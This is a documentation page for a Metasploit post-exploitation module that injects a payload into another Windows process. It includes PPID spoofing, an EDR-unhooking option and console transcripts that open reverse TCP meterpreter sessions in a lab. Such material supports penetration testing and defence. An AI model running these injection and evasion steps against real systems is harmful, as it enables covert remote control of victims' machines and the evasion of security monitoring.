ContextQMD
Back to Metasploit Framework

Payload Inject

documentation/modules/exploit/windows/local/payload_inject.md

6.4.1319.3 KB
Original Source

Description

This module leverages the reflective ddl injection technique to spawn a payload thread in the memory of another running process. To inject into the memory of another process, the meterpreter session must have the required permissions to allocate memory and create a remote thread in the process. The architecture of the payload must match the architecture of the process into which it is injected. If no process is specified, the module will launch a notepad process matching the architecture of the selected payload then inject into it.

Side-Effects

The PPID option can crash certain processes when used. To use the PPID feature, the meterpreter session must have permission to access the process identified by the PPID and the process may also have attributes that limit the ability to use it as a PPID. Certain Windows Metro apps like Calc or Edge will crash if you try and use them as the PPID.

Options

msf exploit(windows/local/payload_inject) > show options

Module options (exploit/windows/local/payload_inject):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   AUTOUNHOOK   false            no        Auto remove EDRs hooks
   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
   PPID         3632             no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   SESSION      1                yes       The session to run this module on.
   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed

Vulnerable Target

This module only works on Windows hosts.

Usage

  1. Create a meterpreter session on the remote host
  2. Begin interacting with the module: use exploit/windows/local/payload_inject.
  3. Set the PAYLOAD and configure it correctly.
  4. If an existing handler is configured to receive the elevated session, then the module's handler should be disabled: set DisablePayloadHandler true. Make sure that the SESSION value is set to the existing session identifier.
  5. Invoke the module: run.

Scenarios

Windows 10x64 Build 17134 No PID

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.168:5555
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 1 opened (192.168.135.168:5555 -> 192.168.132.125:49673) at 2020-01-22 13:10:13 -0600
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/windows/local/payload_inject
msf exploit(windows/local/payload_inject) > show options

Module options (exploit/windows/local/payload_inject):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   AUTOUNHOOK   false            no        Auto remove EDRs hooks
   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
   PPID         0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   SESSION                       yes       The session to run this module on.
   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf exploit(windows/local/payload_inject) > set session 1
session => 1
msf exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/payload_inject) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf exploit(windows/local/payload_inject) > show options

Module options (exploit/windows/local/payload_inject):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   AUTOUNHOOK   false            no        Auto remove EDRs hooks
   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
   PPID         0                no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   SESSION      1                yes       The session to run this module on.
   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf exploit(windows/local/payload_inject) > run

[*] Started reverse TCP handler on 192.168.135.168:4444
[*] Running module against DESKTOP-D1E425Q
[*] Spawned Notepad process 684
[*] Injecting payload into 684
[*] Preparing 'windows/x64/meterpreter/reverse_tcp' for PID 684
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49676) at 2020-01-22 13:12:07 -0600

meterpreter > ps

Process List
============

 PID   PPID  Name                         Arch  Session  User                     Path
 ---   ----  ----                         ----  -------  ----                     ----
 0     0     [System Process]
 4     0     System
 88    4     Registry
.
.
.
 684   7524  notepad.exe                  x64   1        DESKTOP-D1E425Q\msfuser  C:\Windows\System32\notepad.exe
.
.
.
 7524  3632  revtcpx64.exe                x64   1        DESKTOP-D1E425Q\msfuser  C:\Users\msfuser\Desktop\revtcpx64.exe
 7532  4772  chrome.exe                   x64   1        DESKTOP-D1E425Q\msfuser  C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 7876  780   WmiPrvSE.exe
 7904  780   WmiPrvSE.exe
 8000  584   svchost.exe
 8036  584   svchost.exe

meterpreter > getpid
Current pid: 684
meterpreter >

Windows 10x64 Build 17134 No PID

msf exploit(windows/local/payload_inject) > set PPID 3632
PPID => 3632
msf exploit(windows/local/payload_inject) > show options

Module options (exploit/windows/local/payload_inject):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   AUTOUNHOOK   false            no        Auto remove EDRs hooks
   PID          0                no        Process Identifier to inject of process to inject payload. 0=New Process
   PPID         3632             no        Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing)
   SESSION      1                yes       The session to run this module on.
   WAIT_UNHOOK  5                yes       Seconds to wait for unhook to be executed


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf exploit(windows/local/payload_inject) > run

[*] Started reverse TCP handler on 192.168.135.168:4444
[*] Running module against DESKTOP-D1E425Q
[*] Spawned Notepad process 1528
[*] Spoofing PPID 3632
[*] Injecting payload into 1528
[*] Preparing 'windows/x64/meterpreter/reverse_tcp' for PID 1528
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49677) at 2020-01-22 13:16:31 -0600

meterpreter > getpid
Current pid: 1528
meterpreter > ps

Process List
============

 PID   PPID  Name                         Arch  Session  User                     Path
 ---   ----  ----                         ----  -------  ----                     ----
 0     0     [System Process]
 4     0     System
 88    4     Registry
.
.
.
 1528  3632  notepad.exe                  x64   1        DESKTOP-D1E425Q\msfuser  C:\Windows\System32\notepad.exe
.
.
.
 3632  3452  explorer.exe                 x64   1        DESKTOP-D1E425Q\msfuser  C:\Windows\explorer.exe
.
.
.
 7524  3632  revtcpx64.exe                x64   1        DESKTOP-D1E425Q\msfuser  C:\Users\msfuser\Desktop\revtcpx64.exe
 7532  4772  chrome.exe                   x64   1        DESKTOP-D1E425Q\msfuser  C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 7904  780   WmiPrvSE.exe
 7996  780   RuntimeBroker.exe            x64   1        DESKTOP-D1E425Q\msfuser  C:\Windows\System32\RuntimeBroker.exe
 8000  584   svchost.exe
 8036  584   svchost.exe

meterpreter >